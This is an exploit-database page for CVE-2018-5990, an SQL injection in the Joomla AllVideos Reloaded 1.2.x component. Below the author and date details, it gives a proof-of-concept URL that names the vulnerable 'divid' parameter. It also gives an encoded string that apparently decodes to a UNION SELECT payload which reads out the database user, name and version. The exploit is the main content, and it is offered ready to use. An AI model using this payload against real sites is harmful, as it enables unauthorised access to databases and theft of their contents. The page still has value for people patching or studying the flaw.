Lucene search
Ihsan Sencan1337DAY-ID-29815HistoryFeb 17, 2018 - 12:00 a.m.
Joomla AllVideos Reloaded 1.2.x Component - divid SQL Injection Vulnerability
2018-02-1700:00:00
Ihsan Sencan
0day.today
27
0.003 Low
EPSS
Percentile
68.6%
Exploit for php platform in category web applications
# # # #
# Exploit Title: Joomla! Component AllVideos Reloaded 1.2.x - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://allvideos.fritz-elfert.de
# Software Link: http://joomlacode.org/gf/project/allvideos15/frs/?action=FrsReleaseBrowse&frs_package_id=3564
# Version: 1.2.x
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5990
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_avreloaded&view=popup&Itemid=55&divid=[SQL]
#
# JTJkJTZkJTc5JTcwJTZmJTcwJTc1JTcwJTI3JTIwJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTIwJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJkJTJkJTIwJTJk
#
# # # #
# 0day.today [2018-03-14] #Related
cvelist
cvelist
CVE-2018-5990
2018-02-17 07:00:00
nvd
nvd
CVE-2018-5990
2018-02-17 07:29:00
prion
prion
Sql injection
2018-02-17 07:29:00
packetstorm
packetstorm
Joomla! AllVideos Reloaded 1.2.x SQL Injection
2018-02-17 00:00:00
exploitpack
exploitpack
Joomla! Component AllVideos Reloaded 1.2.x - divid SQL Injection
2018-02-16 00:00:00
cve
cve
CVE-2018-5990
2018-02-17 07:29:00
exploitdb
exploitdb
Joomla! Component AllVideos Reloaded 1.2.x - 'divid' SQL Injection
2018-02-16 00:00:00